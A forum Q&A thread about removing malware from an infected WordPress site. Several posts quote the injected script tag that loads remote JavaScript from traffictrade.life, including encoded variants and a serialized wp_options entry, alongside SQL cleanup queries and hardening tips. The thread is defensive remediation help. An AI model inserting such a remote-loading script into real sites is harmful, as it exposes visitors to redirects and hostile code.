CODEWITHSUNDEEP
wordpressspammalwarevirus
Jason Sprague
Jason Sprague

Reputation: 85

Wordpress site infected with malware

A wordpress site my company build a few years ago looks like is infected with malware. What should we do to filter out the malware from the site and prevent this from happening again? Any suggestions greatly appreciated.

it looks like everywhere there is an image file embedded, this piece of code is embeded:

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

thanks

Upvotes: 2

Views: 7808

Answers (3)

Ian Zammit
Ian Zammit

Reputation: 23

I know this thread is pretty old but like one of the comments above i found the injection in the options table.

Before doing anything backup your database!

SELECT * FROM wp_options WHERE option_value LIKE '%traffictrade%'

This will bring you a set of results, the injected script is in a serialized format.

;s:22:"tds_logo_menu_upload_r";s:0:"";s:22:"tds_footer_logo_upload";s:0:"";s:29:"tds_footer_retina_logo_upload";s:0:"";s:25:"tds_site_background_image";s:60:"http://www.domain.co.uk/wp-content/uploads/2016/05/BG.png";s:6:"td_ads";a:8:{s:6:"header";a:6:{s:7:"ad_code";s:87:"<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>";s:9:"disable_m";s:0:"";s:10:"disable_tl";s:0:"";s:10:"disable_tp";s:0:"";s:9:"disable_p";s:0:"";

Notice the traffictrade.life/scripts.js reference in the code (the script tag has been stripped for security from the website)

Remove the script from any results that contain it and save, this stopped my website being redirected.

Upvotes: 0

Muhammad Salman
Muhammad Salman

Reputation: 81

Actually I have faced this issue to my 100+ WordPress websites. I implemented the following security measures to all my websites

  • Delete Inactive Plugins
  • Delete inactive themes
  • Update WP itself
  • Update all active plugins
  • Relocate wp-config.php and include the path in actual wp_config.php
  • Add WP-hide login for changing wp-admin into as user wish.
  • Add limit-login-attempts for limited no of attempts.
  • Move plugins folder to root with rename it too. Also replace all the accurance of /wp-content/ to new location throughout the database.
  • Change wp-content directory name other and replace all the accurance of /wp-content/ to new location throughout the database.

Please use this tool to search and replace, as values may exist in _options table in serialised form https://interconnectit.com/products/search-and-replace-for-wordpress-databases/

Following are possible this malware existence

<script src='\''https://traffictrade.life/scripts.js'\'' type='\''text/javascript'\''></script>

<script src="https://traffictrade.life/scripts.js" type="text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-mce-mce-text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-mce-text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-text/javascript"></script>

Hopefully this may help.

Upvotes: 2

Gandhi
Gandhi

Reputation: 21

there is a malware that happear some days ago. It affected one of my old client site also.

It is affecting pretty much all the posts and pages of the site.

If you look at the post_content of all entries in the wp_posts table of your database, you will see that there is this new script tag 

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

If order to easily remove this malware use this query 

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;

If you are using a caching plugin, make sure you clear your cache.

Hope this help

Upvotes: 2

Related Questions